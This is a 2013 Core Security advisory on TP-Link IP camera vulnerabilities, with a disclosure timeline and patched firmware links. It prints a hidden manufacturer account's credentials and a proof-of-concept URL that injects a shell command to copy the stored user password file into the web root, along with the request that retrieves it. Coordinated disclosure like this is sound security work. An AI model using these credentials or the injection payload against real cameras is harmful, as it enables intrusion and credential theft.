200 lines
No EOL
6.7 KiB
Text
200 lines
No EOL
6.7 KiB
Text
Core Security - Corelabs Advisory
|
|
http://corelabs.coresecurity.com
|
|
|
|
TP-Link IP Cameras Multiple Vulnerabilities
|
|
|
|
1. *Advisory Information*
|
|
|
|
Title: TP-Link IP Cameras Multiple Vulnerabilities
|
|
Advisory ID: CORE-2013-0318
|
|
Advisory URL:
|
|
http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities
|
|
Date published: 2013-05-28
|
|
Date of last update: 2013-05-28
|
|
Vendors contacted: TP-Link
|
|
Release mode: Coordinated release
|
|
|
|
2. *Vulnerability Information*
|
|
|
|
Class: Use of hard-coded credentials [CWE-798], OS command injection
|
|
[CWE-78]
|
|
Impact: Code execution, Security bypass
|
|
Remotely Exploitable: Yes
|
|
Locally Exploitable: No
|
|
CVE Name: CVE-2013-2572, CVE-2013-2573
|
|
|
|
3. *Vulnerability Description*
|
|
|
|
Multiple vulnerabilities have been found in TP-Link IP cameras based on
|
|
firmware v1.6.18P12 and below, that could allow an unauthenticated
|
|
remote attacker:
|
|
|
|
1. [CVE-2013-2572] to bypass user web interface authentication using
|
|
hard-coded credentials.
|
|
2. [CVE-2013-2573] to execute arbitrary commands from the
|
|
administration web interface. This flaw can also be used to obtain all
|
|
credentials of registered users.
|
|
|
|
4. *Vulnerable Packages*
|
|
|
|
. TP-Link IP cameras based on firmware v1.6.18P12 and below.
|
|
Tests and PoC were run on:
|
|
|
|
. TL-SC 3130 [CVE-2013-2572] works with this device only
|
|
. TL-SC 3130G
|
|
. TL-SC 3171G
|
|
. TL-SC 4171G
|
|
|
|
Other TP-Link cameras and firmware versions are probably affected too,
|
|
but they were not checked.
|
|
|
|
5. *Vendor Information, Solutions and Workarounds*
|
|
|
|
Vendor provides the links to patched firmware versions. This software is
|
|
*beta*, TP-Link will release the final versions with release notes and
|
|
some new functions and fixes in the following days.
|
|
|
|
. http://www.tp-link.com/resources/software/TL-SC3430_V1_130527.zip
|
|
. http://www.tp-link.com/resources/software/TL-SC3430N_V1_130527.zip
|
|
. http://www.tp-link.com/resources/software/TL-SC3130_V1_130527.zip
|
|
. http://www.tp-link.com/resources/software/TL-SC3130G_V1_130527.zip
|
|
. http://www.tp-link.com/resources/software/TL-SC3171_V1_130527.zip
|
|
. http://www.tp-link.com/resources/software/TL-SC3171G_V1_130527.zip
|
|
. http://www.tp-link.com/resources/software/TL-SC4171G_V1_130527.zip
|
|
|
|
6. *Credits*
|
|
|
|
These vulnerabilities were discovered and researched by Nahuel Riva and
|
|
Francisco Falcon from Core Exploit Writers Team. The publication of this
|
|
advisory was coordinated by Fernando Miranda from Core Advisories Team.
|
|
|
|
7. *Technical Description / Proof of Concept Code*
|
|
|
|
7.1. *Hard-Coded Credentials in Administrative Web Interface*
|
|
|
|
[CVE-2013-2572] TP-Link IP cameras use the Boa web server [1], a popular
|
|
tiny server for embedded Linux devices. 'boa.conf' is the Boa
|
|
configuration file, and the following account can be found inside:
|
|
|
|
/-----
|
|
# MFT: Specify manufacture commands user name and password
|
|
MFT manufacture erutcafunam
|
|
-----/
|
|
|
|
This account is not visible from the user web interface; users are not
|
|
aware of the existence and cannot eliminate it. Through this account it
|
|
is possible to access two CGI files located in '/cgi-bin/mft/':
|
|
|
|
1. 'manufacture.cgi'
|
|
2. 'wireless_mft.cgi'
|
|
|
|
The last file contains the OS command injection showed in the following
|
|
section.
|
|
|
|
7.2. *OS Command Injection in wireless_mft.cgi*
|
|
|
|
[CVE-2013-2573] The file '/cgi-bin/mft/wireless_mft.cgi', has an OS
|
|
command injection in the parameter 'ap' that can be exploited using the
|
|
hard-coded credentials showed in the previous section:
|
|
|
|
/-----
|
|
username: manufacture
|
|
password: erutcafunam
|
|
-----/
|
|
|
|
The following proof of concept copies the file where the user
|
|
credentials are stored in the web server root directory:
|
|
|
|
/-----
|
|
http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales
|
|
-----/
|
|
|
|
Afterwards, the user credentials can be obtained by requesting:
|
|
|
|
/-----
|
|
http://192.168.1.100/credenciales
|
|
-----/
|
|
|
|
8. *Report Timeline*
|
|
|
|
. 2013-04-29:
|
|
Core Security Technologies notifies the TP-Link Customer Support of the
|
|
vulnerabilities. Publication date is set for May 28th, 2013.
|
|
|
|
. 2013-04-30:
|
|
TP-Link team asks for a report with technical information.
|
|
|
|
. 2013-05-02:
|
|
Technical details sent to TP-Link.
|
|
|
|
. 2013-05-12:
|
|
Vendor notifies that a new firmware will be released around May 20th.
|
|
|
|
. 2013-05-16:
|
|
Core asks vendor if they are ready for coordinated public disclosure on
|
|
May 20th.
|
|
|
|
. 2013-05-17:
|
|
Vendor notifies that they have fixed the firmware but the testing
|
|
process won't be ready before May 24th.
|
|
|
|
. 2013-05-20:
|
|
Core notifies that the advisory publication was re-scheduled for Monday
|
|
27th.
|
|
|
|
. 2013-05-23:
|
|
Vendor sends a copy of the beta firmware in order to confirm if issues
|
|
were fixed.
|
|
|
|
. 2013-05-27:
|
|
Vendor notifies that consumers are able to download the Beta firmware
|
|
from TP-Link website. The final release will be made public in the
|
|
following days, and will increase some new functions.
|
|
|
|
. 2013-05-28:
|
|
Advisory CORE-2013-0318 published.
|
|
|
|
9. *References*
|
|
|
|
[1] http://www.boa.org/.
|
|
|
|
10. *About CoreLabs*
|
|
|
|
CoreLabs, the research center of Core Security Technologies, is charged
|
|
with anticipating the future needs and requirements for information
|
|
security technologies. We conduct our research in several important
|
|
areas of computer security including system vulnerabilities, cyber
|
|
attack planning and simulation, source code auditing, and cryptography.
|
|
Our results include problem formalization, identification of
|
|
vulnerabilities, novel solutions and prototypes for new technologies.
|
|
CoreLabs regularly publishes security advisories, technical papers,
|
|
project information and shared software tools for public use at:
|
|
http://corelabs.coresecurity.com.
|
|
|
|
11. *About Core Security Technologies*
|
|
|
|
Core Security Technologies enables organizations to get ahead of threats
|
|
with security test and measurement solutions that continuously identify
|
|
and demonstrate real-world exposures to their most critical assets. Our
|
|
customers can gain real visibility into their security standing, real
|
|
validation of their security controls, and real metrics to more
|
|
effectively secure their organizations.
|
|
|
|
Core Security's software solutions build on over a decade of trusted
|
|
research and leading-edge threat expertise from the company's Security
|
|
Consulting Services, CoreLabs and Engineering groups. Core Security
|
|
Technologies can be reached at +1 (617) 399-6980 or on the Web at:
|
|
http://www.coresecurity.com.
|
|
|
|
12. *Disclaimer*
|
|
|
|
The contents of this advisory are copyright (c) 2013 Core Security
|
|
Technologies and (c) 2013 CoreLabs, and are licensed under a Creative
|
|
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)
|
|
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
|
|
|
|
13. *PGP/GPG Keys*
|
|
|
|
This advisory has been signed with the GPG key of Core Security
|
|
Technologies advisories team, which is available for download at
|
|
http://www.coresecurity.com/files/attachments/core_security_advisories.asc. |